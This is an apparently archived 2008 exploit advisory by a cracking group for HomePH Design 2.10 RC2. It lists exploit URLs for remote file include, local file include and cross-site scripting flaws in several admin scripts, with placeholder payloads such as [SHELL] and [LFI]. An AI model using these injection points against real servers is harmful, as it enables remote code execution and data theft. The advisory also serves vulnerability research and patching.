HomePH Design 2.10 RC2 (RFI-LFI-XSS) Multiple Vulnerabilities

2008-06-22 00:00:00

ï»¿â”Œâ”Œâ”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”
â”‚â”‚ C r a C k E r â”Œâ”˜
â”Œâ”˜ T H E C R A C K O F E T E R N A L M I G H T â”‚â”‚
â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜â”˜

â”Œâ”€â”€â”€â”€ From The Ashes and Dust Rises An Unimaginable crack.... â”€â”€â”€â”€â”
â”Œâ”Œâ”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”
â”Œâ”˜ [ Remote File Include ] [ Local File Include ] [XSS] â”Œâ”˜
â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜â”˜
: Author : CraCkEr : : :
â”‚ Group : uNiTeD CraCkiNg ForCE â”‚ â”‚ â”‚
â”‚ Script : HomePH Design 2.10 RC2 â”‚ â”‚ Register Globals : â”‚
â”‚ Download : SourceForge.net â”‚ â”‚ â”‚
â”‚ Method : GET â”‚ â”‚ [â–ˆ] ON [ ] OFF â”‚
â”‚ Critical : High [â–‘â–‘â–’â–’â–“â–“â–ˆâ–ˆ] â”‚ â”‚ â”‚
â”‚ Impact : System access â”‚ â”‚ â”‚
â”‚ â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜ â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€ â”‚
â”‚ DALnet #crackers â”Œâ”˜
â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜â”˜
: :
â”‚ Release Notes: â”‚
â”‚ â•â•â•â•â•â•â•â•â•â•â•â•â• â”‚
â”‚ Typically used for remotely exploitable vulnerabilities that can lead to â”‚
â”‚ system compromise. â”‚
â”‚ â”‚

â”Œâ”Œâ”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”
â”Œâ”˜ Exploit URL's â”Œâ”˜
â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜â”˜

[RFI]

http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[SHELL]

[LFI]

http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[LFI]
http://localhost/path/admin/features/account/account.php?language=[LFI]
http://localhost/path/admin/features/downloads/downloads.php?language=[LFI]
http://localhost/path/admin/features/forum/forum.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/delete.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/fotogalerie.php?language=[LFI]

[XSS]

http://localhost/path/admin/features/register/register.php?error_meldung=[XSS]
http://localhost/path/admin/features/memberlist/memberlist.php?feature_language[ueberschrift]=[XSS]
http://localhost/path/admin/features/lostpassword/lostpassword.php?language_array[ueberschrift]=[XSS]
http://localhost/path/admin/features/kalender/eingabe.php?language_feature[titel]=[XSS]
http://localhost/path/admin/features/fotogalerie/eingabe.php?language_feature[bildmenu]=[XSS]

Notes: More files are infected.
â•â•â•â•â•

â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜

Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS

â”Œâ”Œâ”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”
â”Œâ”˜ Â© CraCkEr 2008 â”Œâ”˜
â””â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”˜â”˜

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.